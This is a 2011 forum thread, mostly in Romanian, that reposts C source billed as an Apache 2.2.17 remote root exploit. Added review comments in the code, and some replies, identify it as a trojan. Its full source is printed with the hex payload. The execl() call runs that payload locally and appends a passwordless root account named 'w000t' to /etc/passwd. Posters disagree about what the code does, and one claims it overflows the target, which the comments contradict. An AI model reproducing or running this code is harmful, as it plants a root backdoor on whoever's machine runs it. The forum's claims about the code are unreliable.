Nytro Posted October 19, 2011 Report Share Posted October 19, 2011 Apache 2.2.17 remote root exploit
/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you ~ desg */
/*
 * Review note: this file is a trojan, not a remote exploit.
 *
 * Nothing below attacks a flaw in Apache.  The data written to the target's
 * port 80 is a malloc()ed buffer that is never filled apart from one copy of
 * `evil`, the send() result is compared against the wrong value, and the
 * NOP/OFFSET/ADDR constants are never referenced.  The one thing that does
 * happen is the execl() at the end of main(), which hands `evil` to
 * /bin/sh -c on the host that runs this program.  The tail of `evil` is the
 * text
 *   /bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
 * i.e. an attempt to append a passwordless UID-0 account ("w000t") to the
 * LOCAL /etc/passwd, which can only succeed when the operator runs this as
 * root.  Indicator for a host that has run it: a "w000t::0:0:" line in
 * /etc/passwd.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * `evil`: a self-contained x86 Linux payload.  The leading bytes are a
 * jmp/call/pop stub (\xeb\x2a ... \xe8\xd1\xff\xff\xff) that NUL-terminates
 * the '#'-separated strings that follow and issues int 0x80 with eax = 11
 * (execve); the strings are "/bin/sh", "-c", the echo command quoted above,
 * and "AAAABBBBCCCCDDDD" as scratch space for the argv array.
 *
 * Within this program the bytes are never executed as machine code: they are
 * copied into the transmit buffer and, more importantly, passed verbatim as a
 * shell command string to execl() in main().
 */
char evil[] = "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
              "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
              "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
              "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
              "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
              "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
              "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
              "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
              "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
              "\x44\x44";
/*
 * NOP, OFFSET and ADDR are never used anywhere in this file; they only make
 * the source look like a stack-overflow exploit.  BSIZE and ASIZE size the
 * transmit buffer in main().
 */
#define NOP 0x90
#define BSIZE 1000
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000
/*
 * Entry point.  argv[1] is a host name; the port is hard-coded to 80.
 * Connects, sends a mostly uninitialised buffer, prints a canned "success"
 * message, then executes `evil` through /bin/sh -c on the local machine
 * (see the file header) and spins forever.  Always exits via exit(1) on
 * error paths; otherwise never returns.
 */
int
main(int argc, char *argv[])
{
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;
    /* Usage: <program> <target> */
    if (argc != 2) {
        printf("%s <target>\n", argv[0]);
        exit(1);
    }
    /* malloc() does not zero: every byte outside the two ranges written
     * below is indeterminate, and strlen(buffer) in the send() call reads
     * from buffer[0] through that indeterminate region. */
    buffer = (char *) malloc(BSIZE + ASIZE + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    /* `evil` is placed so that it ends at buffer[BSIZE - 1]; the ';' and the
     * terminator land at BSIZE + ASIZE, inside the allocation. */
    memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil));
    buffer[BSIZE + ASIZE] = ';';
    buffer[BSIZE + ASIZE + 1] = '\0';
    /* Legacy resolver and socket setup: gethostbyname(), bzero() and bcopy()
     * are all obsolescent; h_addr is a compatibility alias for
     * h_addr_list[0]. */
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("no such server\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Can't open socket\n");
        exit(1);
    }
    /* Any connect() failure is reported as "Connection refused". */
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused\n");
        exit(1);
    }
    printf("sending exploit code...\n");
    /* send() returns the byte count or -1; "!= 1" is true for practically
     * every outcome, so "exploit was successful!" is printed regardless of
     * what the target does.  Nothing is ever read back from the socket. */
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("exploit was successful!\n");
    else
        printf("sorry, this site isn't vulnerable\n");
    printf("waiting for shell.....\n");
    /* The real payload: the child runs `evil` as a /bin/sh -c command on
     * the machine executing this program, not on the target.  The opcode
     * bytes are glued to the front of the command word, so whether a given
     * shell actually reaches /bin/echo is shell-dependent, but a POSIX shell
     * typically performs the ">> /etc/passwd" redirection before the
     * command lookup.  Portability nits: the varargs terminator should be
     * (char *)NULL rather than 0, and no header included here declares
     * wait() (<sys/wait.h> is missing). */
    if (fork() == 0)
        execl("/bin/sh", "sh", "-c", evil, 0);
    else
        wait(NULL);
    /* Never returns: busy-loops forever; no shell is ever connected. */
    while (1) { /* shell */ }
}
Sau: [C] /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and - Pastebin.comDiscutie aici, e posibil sa nu fie exploit: Full Disclosure: Apache 2.2.17 exploit? Quote Link to comment Share on other sites More sharing options...
gogusan Posted October 19, 2011: ooo daa, 10x!
Fed0t Posted October 20, 2011: [quote: ooo daa, 10x!] gogusan, si merge? l-ai incercat?
adi003user Posted October 20, 2011: It's a trojan, based on the w00t-shell.c code.
fjtr Posted October 20, 2011: super tare, adaugat la colectie
icemerc Posted October 20, 2011: am testat acum, e backdoor care, daca e rulat cu drept de root, adauga un user w00t cu drept de root, deci nu il folositi
Nytro (Author) Posted October 21, 2011: Acel "evil" hex se termina cu: "/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD". Trimite datele unde ziceti voi: send(s, buffer, strlen(buffer), 0). Asta e executat local: execl("/bin/sh", "sh", "-c", evil, 0); Deci cred ca e fake, backdoor, deci nu executati (cel putin NU ca root). Sau scoateti: if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); Desi acesta e posibil sa fie necesar pentru shell. Nu stiu ce fac primele instructiuni; daca am timp si reusesc sa dezasamblez datele din hex, poate imi dau seama daca infecteaza sau nu. Deocamdata nu sunt sigur daca e backdoor sau nu; rulati ca user normal si nu ar trebui sa fie probleme.
Fed0t Posted October 21, 2011: eu zic ca e bun... face buffer overflow pe tinta... si deschide o sesiune
Nytro (Author) Posted October 21, 2011: Cred ca e fake, cel putin asa spun niste persoane care l-au analizat. Creeaza un cont de root fara parola.